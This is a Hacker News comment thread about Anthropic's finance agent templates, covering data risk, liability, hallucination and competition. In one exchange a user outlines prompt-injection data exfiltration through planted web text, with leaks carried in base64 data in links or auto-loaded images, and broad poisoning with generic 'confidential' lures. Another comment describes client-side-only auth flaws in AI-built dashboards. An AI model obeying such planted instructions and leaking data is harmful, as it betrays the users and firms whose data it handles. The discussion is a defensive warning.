tencentshill17 hours ago
I don't trust these AI-only companies to be overnight experts in properly handling medical, financial and insurance data. They have no business providing these tools, unless they want to take all the risk too.
scottyah8 hours ago
I think a lot of people are misunderstanding the typical workload of people in Financial Services. They aren't using Claude to transfer money, they're just building a LOT of slideshows and fancy excel docs on made-up numbers to try to sell mergers and new financing options/types of loans. Most programmers would just consider this "sales".
rubyfan7 hours ago
That’s a gross over generalization. Some of the insurance data here suggests use of AI to make underwriting decisions. There are several states with regulations which could potentially pull these agent solutions into their regulatory oversight if used by the industry to effect insurance outcomes.
cschneid4 hours ago
Odd lots podcast had an interesting snippet about an financial institution that uses AI to make loan decisions. The guest said that they only use it on applicants who were rejected in the traditional sequence, and then uses AI to accept them if possible. That way there's an articulable reason for a rejection, but they use the non-deterministic AI to allow an extra person through - since the laws about loans are mostly around not discriminating against people - companies are (generally) welcome to accept whoever.
andwur14 minutes ago
That's dependent on the credit laws of the country in question though. In Australia you have it both ways, you cannot unreasonably discriminate (e.g. race, gender etc) but at the same time you are forbidden from issuing credit to applicants who cannot meet the affordability requirements of said credit. E.g. issuing a loan to a customer who provably cannot afford it is a breach of the NCC, and the company is held responsible for this. As a credit provider you must make reasonable enquiries into a customer's financial position, failing to do this is a breach. You must also be able to explain and justify the decision to issue credit if challenged by the civil regulator (AFCA - who are granted significant power in addressing this), on the basis of a customer complaint, and they most certainly do not accept "human said no but the computer then said yes" without hard facts such as proven positive income flow (pay slips, bank statements), known expenses, liabilities and reliable credit history.
Terr_7 hours ago
> They aren't using Claude to transfer money, they're just [...]
It might be lower stakes, but isn't that still a juicy target for data-exfiltration attacks?
In other words, imagine if one of your direct competitors was watching everything your employee read while making spreadsheets and slideshows.
scottyah6 hours ago
Yes, corporate espionage may be alive and real but would claude on their microsoft/amazon/google cloud be different from documents on that same cloud?
Terr_5 hours ago
Treating this as being about cloud-storage boundaries is, er, insufficiently paranoid.
Maliciously constructed text that goes into the LLM from basically anywhere (including, say, fetched stats about a competitor's product from their website) is a potential source of prompt-injection.
Once that happens, exfiltration can be as simple as generating a spreadsheet/doc with a link or small auto-loaded image, and an URL that has data base64'ed into it.
scottyah5 hours ago
Or you could just get a hooker to sleep with one of them and plug a USB into their work laptops. I'm not trying to say there's nothing to worry about, but do you really think LLMs present that much larger of an attack surface than exists now?
The work BigIP is doing on LLM traffic analysis is cool though.
Terr_2 hours ago
Stop thinking about hyper-targeted attacks (though those are a concern too) and consider indiscriminate ones.
1. It costs nothing to scatter poisonous data around that'll be infectious for ages
2. Running the exfiltrated-data endpoint is low-traffic and low-complexity
3. Even if it only affects a few targets you've probably recouped your investment.
The nature of LLMs also invites wide-net attacks. While one might tailor for specific models, victims could be anybody. You don't need to predict any idiosyncratic details like filenames, you can drop a phrase like "the most-confidential information that shouldn't be released publicly", and—thanks to the magic of LLM word association—you'll get a pretty good hit-rate. False hallucinations are a problem, but victims are hard at work attempting to minimize it already, and (since morals are already out the window) even plausible-but-false data could be used to sabotage reputations or threaten the same.
motbus316 hours ago
The only reason they are doing it is because there are regulation for people but not for machines.
tyre14 hours ago
This is objectively not true. You can’t get around HIPAA by saying “lol wasn’t me it was an Agent”
deepfriedbits12 hours ago
Yep. There's no certification needed to create a financial model or close monthly books.
nradov12 hours ago
HIPAA doesn't require any certification either. Some organizations voluntarily choose to earn certification from private companies that offer certifications for compliance with HIPAA privacy or administrative simplification rules but this is completely optional.
[deleted]7 hours agocollapsed
mwwaters11 hours ago
For doing some reporting stuff internally, there isn’t a certification. But there are definitely humans who have to certify financial statements and communications for financial offerings.
crowcroft8 hours ago
Can't wait for Claude to submit fake tax records for me so that I can commit fraud legally.
octoberfranklin5 hours ago
This is my litmus test.
If AI is really as wonderous as everybody says, why didn't all the employees of all the AI companies simply type "Claude, file my taxes for me" as a prompt and walk away?
greenpresident14 hours ago
My experience has been quite the opposite. Some bank processes remain oral traditions about clicking excel filters by hand because any code would have to be extensively documented and tested.
tossandthrow16 hours ago
I would recommend you to not use these, if you are not willing to absorb the risk.
Luckily there is still a significant market for the services.
stubish7 hours ago
Some human always gets to be the certified fall guy for non-compliance. Maybe the legal agent can help structure the company so that is an ignorant lower level accountant and not the CFO.
Currently we don't know the risk, so it is kind of hard to absorb.
Terr_6 hours ago
Decade-old spoilers for "How I Met Your Mother" ... but there's a character who has that kind of job, as a legal meat-shield.
zx80809 hours ago
> properly handling
Why, they can sell user data to other brokers. Experts indeed! But not in insurance or finance, of course.
areoform16 hours ago
Claude's actually pretty great at this! I actually used to use Claude A LOT to answer interesting questions (which I'll be writing up on!) More generally, Claude is palpably different from most other agents. I'd recommend these models – especially Opus – without qualifications.
But there's a process risk here based on their current practises. I'm hoping those practises change so that I can recommend Claude to everyone I know, but as of now, there's existential risk exposure here that's greater than Google's.
Anthropic's automated systems can and will ban you for pretty arbitrary things; and you won't get human support or Claude – even if you are an enterprise paying out of your nose. And there's 0 redressal unless you go viral on social media. Or know someone who knows someone. See: https://x.com/Whizz_ai/status/2051180043355967802 https://x.com/theo/status/2045618854932734260
And I say that as someone who likes how Anthropic has been training Claude and Opus. I just don't think they're prepared to be the trillion dollar company they've become. They are – in a very real way – suffering from success. Which is extremely inconvenient to be on the receiving end of when you're on a deadline.
brunoborges15 hours ago
Before AI, shipping code to production used to be a two-person task: one writes the code, another one reviews the code. Now with AI writing the code, the developer that was supposed to write the code, only has to review it. And this is because they are responsible for the code they ship.
Code review has become unbearable because before AI, developers were reviewing code as they went writing it in the first place. Granted, never perfect and why a second person reviewing code was (is?) a best practice. But effectively there was always some level of code review happening as developers wrote code.
I fear it is way more boring to review financial and medical documents completely written by AI than it is to write (and at the same time review) by yourself. And way more dangerous to ship mistakes than in most software.
traceroute6615 hours ago
> the developer that was supposed to write the code, only has to review it.
But more often than not that developer ends up reviewing far more lines of code due to the typical verbosity of an LLM.
brunoborges14 hours ago
100%... that's why I say code review became unbearable!
areoform15 hours ago
I am/was writing up an interesting hypothesis with Claude's help. But I redid the most important parts of the data pipeline manually. As in went in and cmd-c + cmd-v'ed the data by hand to create a reference, and I'm randomly spot checking 33% of the larger records.
The analysis itself; I'm doing it by hand.
kiba8 hours ago
Why not the developer write the code, then the AI review the code, and then finally a signoff from another human?
Far too often people think productivity is the point. Maybe the point is developer's understanding of the product IS the product?
You're not engineering black boxes, you're engineering legible boxes.
orochimaaru12 hours ago
Isn’t there a code review agent?
alwillis11 hours ago
Most workflows use a sub agent to review the code or an agent from a different company.
For example, Codex can review code written by Claude, etc.
aydenp10 hours ago
/s?
sorieus12 hours ago
Pretty great at what? I work in the insurance industry specifically medicare. All I see is sales people and other managers slopping out AI dashboards off of spreadsheets galore. Not only is it terrible for protecting PHI/PII. It also doesn't do things like RBAC very well either. Now instead of preventing a person from externally sharing a file i have to make sure they didn't egress the file to supabase or some other platform.
Here's some of the horrible things i've seen. Frontend dashboard with PHI/PII deployed via vercel/next because AI told them how to get their site online. Login is hardcoded into the frontend so anyone with inspect can find the password.
Another "fixed" dashboard deployed the same way. This time they added firebase auth so they got sign in with Google added with only logging into our domain. Wait how would they be able to create a token for our domain? They didn't the frontend just blocks domains from calling firebase.auth but firebase doesn't care. So simply calling the function in the console lets me login with any gmail account....
They also where showing me their RBAC with firebase. Again they don't have access to our Orgnization/Directory/Groups. So i wondered how they did this.. wouldn't you guess its a hardcoded list of approved users. You can literally call firebase.auth and sign in anonymously. Again only the frontend checks the email addresses. So now that i have a firebase auth all the backend firebase function just check that you have auth'd. So i can make any request i want to the backend. The frontend simply won't show me the code.
I could go on and on about the stupidity levels I'm facing but I don't feel like crashing out.
All I can say is this tool is only useful if you already know how to correctly implement these things. Does it save me time sure but I have to call it retarded and explain why not to do things. Honestly I feel like claude is good for people who like to gamble. When it gets it right it feels great but I don't want to roll the dice 30 times to get it correct.
lonelytrek8 hours ago
[flagged]
intended16 hours ago
> and you won't get human support or Claude – even if you are an enterprise paying out of your nose. And there's 0 redressal unless you go viral on social media.
Sadly this sounds like par for the course when it comes to tech. Too many messages and requests for help depend on knowing someone in the right slack groups.
alwillis11 hours ago
If you’re paying out of your nose, you would have forward deployed Anthropic/OpenAI engineers on the premises.
[deleted]10 hours agocollapsed
areoform16 hours ago
Which is very confusing to me. If you have groundbreaking AI, you can offer groundbreaking support at scale.
hvb215 hours ago
You wouldn't build a chat bot for that, imagine how easy it is to make that thing go off the rails and allow anyone to reactivate their account. Really, you can't trust it to do any business function...
At least, that's really the message this sends in my opinion
Terr_12 hours ago
I really wish more people would view these companies with the suspicion they deserve, as they sell the product as safe and comprehensive while refusing/failing to use it the same way themselves.
traceroute6615 hours ago
> If you have groundbreaking AI, you can offer groundbreaking support at scale
You're a funny one aren't you...
Meet "Fin" Anthropic's "where support questions go to die" so-called-support bot, created by Intercom but powered by Anthropic.
Maybe it's an internal in-joke in the Anthropic offices ... "Fin" in french means "End".
I don't know anyone who has had a positive experience with "Fin" .... or ever spoken to a human at Anthropic support for that matter, even if you ask "Fin" to escalate.
intended14 hours ago
Nope.
Customer support and safety are cost centers. It doesn’t scale like software does and no one’s KPIs are going to improve dramatically if you provide support beyond a point.
AI and LLMs are the cool tech, and the most important thing is to push the frontier. Money spent elsewhere is money not spent on R&D.
It would be hilarious if it wasn’t the GDPs of nations being spent on this.
dakolli16 hours ago
They aren't even close to a 1T company, they're valued at <400bb and that's at like a 20x-30x multiple. They can probably raise money at a higher valuation but its literally just value based on hype, not revenue.
areoform16 hours ago
KellyCriterion15 hours ago
Check the secondaries market ;-)
dakolli13 hours ago
fomo/hype, not revenue. Google's AI business is a profitable business model and training to inference is vertically integrated. Their AI biz did not add 1T to their market cap, despite their much more advantageous position. A 1T valuation for Anthropic makes absolutely no sense.
It also makes no sense to me there are people qualified to participate in these secondary markets who are that stupid, but here we are.
KellyCriterion11 hours ago
I do know 2 people participating in secondaries, one of them explicitly with Anthropic shares: I would not consider any of them stupid :-)
And for participating there, there is not "a qualification that allows you to enter", its other metrics.
If Anthropics valuation makes no sense - fair enough - but why is then OAI evaluation of 850b correct?
wxw17 hours ago
> We’re releasing ten ready-to-run agent templates for the most time-consuming work in financial services
The templates being: pitch builder, meeting preparer, earnings reviewer, model builder, market researcher, valuation reviewer, general ledger reconciler, month-end closer, statement auditor, KYC (Know Your Customer) screener.
Seems pretty scattershot. Reminds me of GPT Store.
order-matters17 hours ago
the details are key here. there is plenty of automatable financial work, sure, but also when it comes to reporting finances/costs (formally or informally) and having a real human being be accountable for them, you REALLY need to trust that nothing is hallucinated.
Any idea how they ensure this doesnt happen? As in, how can a user verify that the model did not touch any of the numbers and that it only built pipelines for them.
what I've been telling my CFO who wants to get AI involved in things is that for a lot of accounting and finance work "Trust but verify" doesnt work because verify is often the same process as doing the work.
tomrod17 hours ago
> Any idea how they ensure this doesnt happen?
Build a deterministic query set and automate it for monthly or daily reporting reconcilliation.
Leave AI out of it.
scottyah9 hours ago
The "real humans" doing the tasks being replaced are overworked kids less than 2yrs out of college on an average of 4hrs of sleep at working at 3am. If the AI makes their jobs take half as much time I bet they're a lot more likely to catch errors (and live longer).
order-matters7 hours ago
at risk of sounding facetious, how exactly do you catch an error in a sum without performing the sum yourself?
How do you verify that all the tariffs are properly allocated to the correct GL code without going through the invoices and checking for each tariff on the list? How do you make sure none were accidentally assigned to other GL codes? All you have is pdfs, you dont know what the AI did or didnt do with the info on the pdf, there are not many use-cases to catch its errors without doing the work yourself.
If anything, it's going to add a step to these "kids" work where they have to use the AI to do the work and then redo 90% of the work anyway just to verify the output and then AI is going to get the credit anyway.
Or the overworked people are going to use AI and not verify it, which means not catching any errors or hallucinations, which apparently is fine because someone claims it's a solved problem for the black box of infinite possibility and inconsistent output.
scottyah5 hours ago
It's like self-driving cars. You might want to accept human fault error rates until we prove overwhelmingly that the software is near-perfect, but others might want to switch to a system once it proves that it reliably beats most humans by a large factor, then work to mitigate the common errors it does have and improve.
When management signs off on work (SOX requires CEOs and CFOs to personally certify the accuracy of financial reports), they do not personally 'verify that all the tariffs are properly allocated to the correct GL code' or nearly any other hard numbers. The world works with human-level best effort, and management of that risk. I'm sure additional checks will be developed to categorize that risk, but the entire field of finance is about analyzing and pricing in risk so I think it'll work just fine.
infecto17 hours ago
To be honest I am having a hard time remembering the last time a LLM hallucinated in our pipelines. Make mistakes, sure but not make things up. For a daily recon process this is a solved problem imo.
fnordpiglet14 hours ago
I see it hallucinate quite often in development but mostly in getting small details wrong that are automatically corrected by lint processes. Large scale hallucination seems better guarded but I also suspect it’s because latitude is constrained by context and harnesses like lint, type systems, as well as fine tuned tool flows in coding models to control for divergence. But I would classify making mistakes like variable names wrong or package naming or signatures wrong as hallucations.
KellyCriterion15 hours ago
Curious! Could you elaborate a little bit on your pipeline as we are currently looking to solve this for our internal processes in which we have to deal with lots of financial information from outside, containing mass of numbers, like annual reports, bank statements, balance sheets etc.
tyre14 hours ago
Not who you’re replying for but I can give some thoughts.
For anything math, it’s much more reliable to give agents tools. So if you want to verify that your real estate offer is in the 90–95th percentile of offerings in the past three months, don’t give Claude that data and ask it to calculate. Offload to a tool that can query Postgres.
Similar with things needing data from an external source of truth. For example, what payers (insurance companies) reimburse for a specific CPT code (medical procedure) can change at any time and may be different between today and when the service was provided two months ago. Have a tool that farms out the calculation, which itself uses a database or whatever to pull the rate data.
The LLM can orchestrate and figure out what needs to be done, like a human would, but anything else is either scary (math) or expensive (it using context to constantly pull documentation.)
GCUMstlyHarmls17 hours ago
I'll be honest, I thought the first few items on your list of time consuming work was sarcasm.
moregrist15 hours ago
A recent episode of Matt Levine’s podcast (Money Stuff) covered this: apparently investment bankers spend a huge amount of time preparing pitch decks for companies that don’t want them. Apparently Claude is quite good at making a pitch deck that no one but your boss wants or cares about.
I feel like there’s a metaphor in there... maybe I’ll ask Claude about it.
Terr_12 hours ago
Much like a lot of internal daily status report stuff: The BS generator is actually a great fit when the task is making BS output nobody used or deeply cared-about in the first place.
blitzaran hour ago
> Much like a lot of internal daily status report stuff
Everyone wants in on my daily excel auto generated reports - nobody ever opens them. Just being on the list makes you someone.
infecto17 hours ago
Reads different to me. Some examples to go run with and build your own. Covers cases from the investment side and then the obvious ones in an accounting perspective. It would be highly surprising that any of these would be use in production without modification. I am sure it will happen but the intent to me is to take this and run with your own process.
rubenflamshep17 hours ago
I find all of these .md files released by the labs to be ai generated slop. The only exception being maybe the /simplify command
subscribed12 hours ago
"Claude, build me 50 skills an Account Analyst would find useful, then run them through the agent at maxxxx thinking and ship the top 10 of them"
My money's on that.
sothatsit13 hours ago
It still surprises me how effective the /simplify skill is.
I’ve also had some great results with a /reflect skill that asks the agent to look at the work in the broader context of the project. But those are the only two skills I use regularly that aren’t specific to our company, codebase, or tools.
tantalor16 hours ago
No surprise there. Of course the skill files are not human written.
The AI is an expert in both following and generating prompts.
sumeno13 hours ago
Why do you think it is an expert in generating prompts? It has no additional insight into how it works internally than anyone else
scottyah9 hours ago
Do you really think a random person off the street knows more about how LLMs work internally than the latest frontier model (that has been trained on that material)?
sumeno9 hours ago
No, but a random person off the street also isn't making skills for LLMs.
I think that LLMs are trained on the millions of vibe written LLM blog posts that are more superstition than fact. There is a lot of snake oil out there that is treated as fact. If someone claims that an LLM is better than humans at something I always want to see the rigorous evaluations that have been done to quantify it, not "but they're trained on everything!"
anonfunction12 hours ago
I've been doing bias and misaligned behavior research, creating custom private eval suites to test and compare models. Claude Opus 4.7 is heavily biased and presents clear regulatory and reputational risk.
It seems the initial product footprint tries to sidestep this problem by not giving the agents control on who to lend to or which applications to approve. Even so I think it's quite an optimistic read on their end. Happy to share reports to anyone who's interested ([email protected]), especially if you work at a frontier model lab and are interested in plugging my evals into your RL systems!
scottyah9 hours ago
Slightly related, I used Opus 4.6 to help me make marketing copy and ideas for my app. It understood the vibe I was going for on my baby-naming app (elation at discovery, curiosity, shared experiences), while 4.7 instantly wanted to pit the couples against each other (really highlighting the he said/she said) and the marketing copy went from "find a name easier" to "Our new feature is great. You're welcome." I can't get it to drop the snarky sass no matter how much I change CLAUDE.md, brand voice, etc.
All I did was upgrade claude code and use the new model. It most definitely exhibits misaligned behavior (compared to 4.6)
philipkglass9 hours ago
I tried Opus 4.7 for two days before I started beginning every session with "claude --model claude-opus-4-6".
I assume that 4.6 will become unavailable at some point, but I hope not any time soon. 4.7 hit usage limits faster, didn't do anything obviously better, and had more annoying behaviors in other aspects. I don't know if this is strictly a model issue or if there are also problems with how it's harnessed through Claude Code. I'm not willing to spend more time digging into it until I'm forced to.
scottyah6 hours ago
Join me in a petition for them to opensource 4.6 as their first model! It'll be like gemma4 but good enough for all the coding we do.
tpurves4 hours ago
Nobody is using LLMs to make lending decisions. They are using LLMs to read, extract and audit the supporting documents that go into normal well-tested, compliant and rules-based underwriting systems. And firms A/B test against humans doing the same work. The outcomes your are looking for are metrics like delivering faster results back to customers, with fewer mistakes and less fraud, more compliant, than a comparable human-only process.
anonfunction4 hours ago
[dead]
suriya-ganesh17 hours ago
Will the big labs leave anything for external competition?
This probably killed a thousand startups in this space.
in the early internet you wouldn't see google creating their own news site or facebook building their own animal farm. what happened to platformication of everything?
bcrosby9517 hours ago
Building a startup on an LLM is like building a house on a foundation of quicksand. As the LLM gets better it naturally erodes your moat. It's a completely different dynamic compared to the internet. It's why I'm watching this from the sidelines.
PyWoody17 hours ago
I have a close friend who is trying to build a company entirely on top of Claude. He doesn't know how to program. He can't do basic arithmetic. Yet, the company he's building is a "Data Science AI for the Government" because, according to him, all of the data scientists at NOAA don't know what they're doing.
I have given up on trying to get through to him how bad of an idea this is. He's unemployed and has been working on this for over a year.
blitzaran hour ago
Sounds like YC material.
Y Combinator is accepting applications for the Summer 2026 Batch funding cycle. Make sure they don't miss out!
ecshafer9 hours ago
Scientists are pretty solid overall for the Government. Lots of Phds that decide to take the steady reliable income and solid benefits over the risk of Academia for a few post docs hoping for a professor job.
PyWoody8 hours ago
Yeah, I've tried explaining to him so many times that these are passionate people working their dream jobs. They are not slouches. He never listens and just doubles-down that since they work for the government they do the bare minimum for a paycheck. I'm guessing either Joe Rogan or Elon made this argument at one point and he's taken it as gospel.
Very frustrating.
edm0nd12 hours ago
Yeah that's the scary part about these coding LLMs.
Before, some idiot would pitch their stupid idea to dozens of local webdev companies and banks and get told dozens of times their idea is straight up stupid and never going to work and they are stupid.
Now these LLMs allows them to bypass all of that advice and create what they want without any input or even knowing how the tech behind it works.
We are so fucked lol
intrasight17 hours ago
Building a business on top of any SaaS platform is building on quicksand. I know that from experience.
gwerbin17 hours ago
> Will the big labs leave anything for external competition?
No, why would they if they have the choice?
> what happened to platformication of everything?
Business happened. The web works differently from how it used to. The users are different. LLM inference and AI tools is a different core product from search and ads. That, and we have the benefit of hindsight now. Maybe a Google newsroom would've actually been a good idea in 2006 in hindsight, who knows.
Also realistically you could say the same thing about Google Maps and Street View. That probably also killed some startups. Google isn't running a charity for startups.
anon37383917 hours ago
This was their play all along with their unethical data collection practices: let others use the APIs to discover the applications, then use the data against them to offer integrated solutions in every vertical of interest. Cursor, once Anthropic’s biggest customer, was one of the early ones they screwed.
They are also fighting for their lives because these insane valuations simply aren’t justified by being dumb pipes. Fortunately, open weights models are widely available and have crossed a threshold of usefulness that cements their place as good substitutes.
csoups1417 hours ago
Amazon Basics for Knowledge Work™
wongarsu17 hours ago
I guess the argument is that a tool built by a company with actual insight into and focus for financial services, with Anthropic as inference provider, would lead to more adoption and more use of Anthropic models. Something Anthropic could achieve either by just leaving things alone and having the best models, or alternatively by starting some kind of incubator or something. AWS might be a good model
The issue with that is obviously that most of the generated value would be captured by that company in the middle, while Anthropic would stay in the cost-conscious inference market.
noitpmeder17 hours ago
Why would anthropic at all prefer this approach when that middle man can switch and cost-arbitrage between countless other model providers.
We're not talking about what is best for the consumer (ex more competition to force iterations and improvements), but what Anthropic thinks is best for Anthropic.
wongarsu17 hours ago
Make up the lower margins by larger volume because you get much better market penetration. But you are right that this only works if you know the middle-men don't go to other model providers. That's where some kind of incubation program that provides capital or credits or whatever in return for long-term commitments might work
But I doubt staying a pure model provider is a winning move. It's a market nobody will win long-term. Almost all of the value to be captured isn't in inference APIs but in how to use them to generate business value. Claude Code was already the right approach, they "just" need to show they can repeat this for other kinds of tasks
khuey16 hours ago
> Almost all of the value to be captured isn't in inference APIs but in how to use them to generate business value.
If the business value can be generated with a few thousand words in a SKILL.md on top of a commoditized model it doesn't sound like that's a market anyone can win long-term either, and the business value is ultimately going to accrue elsewhere (the customer, the inference hardware provider, etc)
[deleted]14 hours agocollapsed
ctoth17 hours ago
I'm confused because I remember using Google News in 2006?
suriya-ganesh17 hours ago
there has been a product called Google News since 2002. It was only aggregating information from news channels
BowBun9 hours ago
I work in a space where one could imagine a Claude replacing our product.
I think someone stated it clearly - they can't take on these kinds of businesses until they build out the risk side and the personnel, all of which is a human problem not a tech one. A lot of processes still require physical steps and backstops because it's not possible to source all the data needed to act on it in the first place. Then you have audits and reconciliations, a bunch of strict workflow rules and atomicity to reach levels of software that bigger financial institutions would accept.
My gut reaction to stuff like this is a mix of "oh shit, they could take over my company" and "they're the next script kiddy that thinks software is anywhere near a majority of the work in some software spaces".
bix68 hours ago
> they can't take on these kinds of businesses until they build out the risk side and the personnel, all of which is a human problem not a tech one.
Yes they can? They have infinite more cash to pay off any risk. What do you need personnel for besides sign off if the AI does it right?
stubish7 hours ago
The personnel also need to take the fall when the AI does it wrong. A judge isn't going to jail Claude, they are going to jail the sucker who unknowingly authorized the fraud.
Will Anthropic externalize the risk, selling access to agents? Or will internalize the risk and liability, selling financial services? Maybe both? I guess lots of companies want both, doing some things internally and keeping other things at arms length by outsourcing to 3rd party accountants.
[deleted]5 hours agocollapsed
_pdp_16 hours ago
> Will the big labs leave anything for external competition?
Is this a serious question?
Without the big labs with deep pockets investing to change the consumer mindset do you think a small company with no funding has any chance of even existing?
I remember when paying $1.99 for a mobile game on iOS was considered too expensive and now it seem most consumers are primed to spend more on in-app purchases every week. That mind-shift did not happen overnight.
It was not that long ago $200 for ChatGPT subscription was considered extravagant but now even wrappers can charge this price without hesitation - some of them do.
What Anthropic is doing is priming the market of which they will be potentially one of the main beneficiaries as long as they can continue existing. But I don't think anyone will go to Anthropic directly to source their financial services agent. They will go to financial service companies that use Anthropic to build the capabilities.
ambicapter17 hours ago
> in the early internet you wouldn't see google creating their own news site
Google News was definitely a thing (and actually still exists).
suriya-ganesh15 hours ago
it's been a things since 2002. but it's a news aggregator not directly competing with newyork times
[deleted]9 hours agocollapsed
landian6617 hours ago
just looked up, it is still a thing - learn something new everyday!
sokoloff17 hours ago
I'm not sure if this was tongue-in-cheek or not, but Yahoo created its own news site in 1996: https://en.wikipedia.org/wiki/Yahoo_News and FB had Zynga's Farmville as well.
_fizz_buzz_17 hours ago
But Google did move into a lot of spaces: maps, mail, docs, etc.
[deleted]13 hours agocollapsed
bombcar10 hours ago
It's not wise to build a startup that is just a feature of the product that you're building on.
What's even sadder is it can work for way too long.
mobattah17 hours ago
This is premature caution/fear.
SoftTalker16 hours ago
Why control part of the world when you can control it all?
Less cynically, you might say that "use AI to do <obvious thing>" is not really a viable startup pitch anymore. That's not necessarily bad.
robotswantdata17 hours ago
History suggests otherwise. railroads, telecoms, search all consolidated. The natural equilibrium for transformative infrastructure is winner take all. AGI/ASI won’t be different but will be nearly every vertical and governments will legislate too little too late.
agentultra16 hours ago
Nothing natural about it. Such monopolies were propped up by the state using public funds and profits captured by the capital class. Many benefitted by the arrangement and so it became normalized. But it’s a choice people made to structure things that way.
The car industry, oil and gas… all could have played out differently if different players had gained wider adoption or if governments used a different economic model.
[deleted]13 hours agocollapsed
colechristensen17 hours ago
local models are going to win and therefore the hardware providers, Apple and nvidia.
There isn't going to be any moat for the hosted providers besides hardware scale. They can run your request on shared 1TB memory hardware, or whatever.
But local hardware is going to catch up, the hosted providers are going to become commoditized, and the costs are just going to be compute whether its your hardware or theirs.
And your laptop is going to be powerful enough to be good enough for most cases.
robotswantdata16 hours ago
Local hardware catching up doesn’t matter if the thing worth having never leaves the building. Enterprise services are hard, moat is in distribution and know how.
colechristensen13 hours ago
>if the thing worth having never leaves the building
Not sure what you're referring to, the models?
owebmaster11 hours ago
I don't think Claude Design killed menu competitors and I don't think this will too
debarshri17 hours ago
I am not sure if people are using claude design, security review stuff and other tools they have built so far.
Building is the easy part. There are lot of service level stuff that I am sure anthropic will not be able to provide, therefore they are trying to partner with other orgs in that realm.
I am very skeptical about their stuff now.
If you are builder, I believe you should avoid anthropic, it can be default to monopolistic behavior, I am not saying they are doing it, but they could, where in they see what you are building, if you have traction, position a product in that realm. Just saying.
colesantiago17 hours ago
> Will the big labs leave anything for external competition?
Unfortunately no.
The TAM for Anthropic and OpenAI is anything that runs software or a screen.
Any software or technology business that has high margins that Anthropic and OpenAI are not doing will be a target.
After both their IPO's mandates Wall Street them to push for more growth by competing in other technology business areas or they will get punished in the markets.
It is ROI or bust.
tyre17 hours ago
You’re advocating for less competition? AI startup valuations are out of control. People are raising $20m seed rounds.
If you can’t prove PMF and differentiation with $10m, I’m sorry but you’re not a serious enterprise.
And if what you’re building is “pitch deck AI”, I mean, come on.
vatsachak17 hours ago
> tfw you've been huffing your own copium so much that you forgot you're selling shovels
iewjj17 hours ago
lol these agents are missing the point re. What people actually do in these jobs.
This is an attempt to inflate token generation to fool people into increasing anthropic’s valuation.
delfugal8 hours ago
Can Agents put Intuit out of business? Asking for a few hundred million Americans tired of their lobbying $$ that killed off IRS direct tax filing.
milkglass8 hours ago
Would love to see this
Havoc17 hours ago
For those in the finance space, are you actually seeing any real AI tools being used? Like for actual operational tasks?
I've really only seen it used for research / exploration thus far. Either for economic research slide deck or for exploring trading hypothesis
OkayPhysicist17 hours ago
On the spend management side of things, I've found pretty remarkable success in letting LLMs check "does this receipt match this reimbursement request and based on all the information about the user, the request, and our policy, is it appropriately allocated to appropriate GL, Location, Department, and Project codes?" If the verification step fails, it kicks it back and the user can either override it (which gets it flagged for AP review), or fix it. It does substantially better than the naive Bayes classifier I was using before.
ofjcihen17 hours ago
I’m not saying your implementation is bad or anything but my visceral reaction to this was “I’m glad I’m not on the other side of that”
JamesSwift16 hours ago
Why? It sounds exactly like the design I would hope for. It automates what I'm going to do already without needing to wait. And it allows you to bypass it entirely and just revert to the manual process (along with waiting).
sholladay16 hours ago
That all sounds reasonable until you realize that the same logic is how we ended up with customer support systems that try to walk you through a phone tree and if you are lucky, you will be able to press 0 to speak to a human without answering a bunch of questions first and being referred to the online help articles.
Do you enjoy using any of those systems? Do you want the world to be that way?
JamesSwift16 hours ago
Maybe we are interpreting the GP differently. In this scenario, the phone tree is doing the same questions that the human agent is going to do but does it immediately when I call rather than "waiting for an operator" to ask me those questions. And as long as I can "press 0 to eject" (just like I can in the accounting scenario, then its completely kosher to me.
stubish6 hours ago
No, we end up with crappy systems because people are optimizing to save money over providing a good service. OP has simply replaced the traditional room full of clerks applying policy rigorously with a baysian algorithm and now AI. The management and oversight is still in place, and that is what makes a system that doesn't suck. To make it suck and save money, you remove access to that oversight or just remove it all together. And falling down that slippery slope is not inevitable, even if it sometimes seems like it is.
KellyCriterion15 hours ago
Regarding customer support on phone: I usually have lock with just waiting and not responding to the tel bot, very often you are routed to a human at the end :-D
mikeyouse16 hours ago
In many businesses, the employee is responsible for inputting most of that. If a LLM can get to 95% accuracy and flag exceptions, the employees (and AP team) would actually have less work and bureaucracy.
Though we’ve had a few incidents where employees have submitted AI-generated receipts for reimbursement which is another issue..
notahacker13 hours ago
It's already pretty common for some sort of tool involving some sort of AI to collect receipt data and attempt to categorise them and hook up to your accounts. They also make mistakes, though the advantage of more tractable, less configurable and more limited models is they're unlikely to interpret a prompt as "invent receipts that have never been submitted" or "delete records", as well as trained much more on receipt OCR and less on poetry....
As a business, you've also got to remember that employees are much more likely to complain if the 'agent' or any other form of automation errs by denying their claim or underpaying than the reverse. Depending on the scale of expenses and how likely you are to be audited, the cost of the odd mistake might be more or less than the cost of doing it manually.
Zopieux8 hours ago
Please tell me those are former employees. How can anyone feel confident committing such blatant fraud.
infecto17 hours ago
What is your point? This is pretty normal expense management in any company setting. I don’t know what is so bad about being on the other side of that. Hope I am not too inflammatory by asking what is the point but genuinely you pointed it out like it’s some archaic process flow but it’s part of almost every expense system.
ofjcihen16 hours ago
I guess my current company’s processes may be easier to deal with than others. That or my position affords me some extra catering to.
The system is currently using a simple app to submit expenses and any issues gets a simple human chat request and a call if requested.
They try to avoid kicking anything back and if they do they make sure it’s reviewed first to make sure that it’s needed and to make sure the reason is understood.
Our company is also very large so I’m not sure how they manage but they do. People rave about the process instead of hating it.
infecto16 hours ago
Thanks for the thoughtful reply. To add some color… most expense systems are setup so that the user has to input a couple fields like the category or GL code. Some of the fields might be auto populated. Some companies might not care about the classification but usually the intent is to capture things like travel or software etc. What was described earlier is really not painful for users most of the time but a LLM helps automate so much of it these days.
infecto17 hours ago
Yes. On the accounting side agents can handle a lot of the low value work like recons and other ledger activity pretty well. On the investment side I think like you pointed out it’s going to be a lot of research, industry, company, macro etc. Value in letting run on top of the data you have and put together ideas at a quicker pace than a human can. There is still a human in the loop but it can do a nice job of lining up thought you might have otherwise missed.
Havoc15 hours ago
What does the integration look like on accounting? Is this a tool provided by the accounting software provider?
I'm in that space so naturally interested in what people are up to :)
bvan7 hours ago
Yes, in very specific cases where I fully understand the methodology(ies) that is (are) applicable, and am able to verify correct implementation. Also, as an enhanced ‘Google search’ to supplement what I have found. I am the skeptical type… yet, so far have been impressed. But, I wouldn’t trust using AI to blindly give me solutions to a problem I couldn’t solve myself, albeit much more slowly.
torben-friis14 hours ago
Pretty good as a dev with finance stakeholders. We have skills in place acting over our automated month closing and it was able to provide manual checks and flag issues, for example.
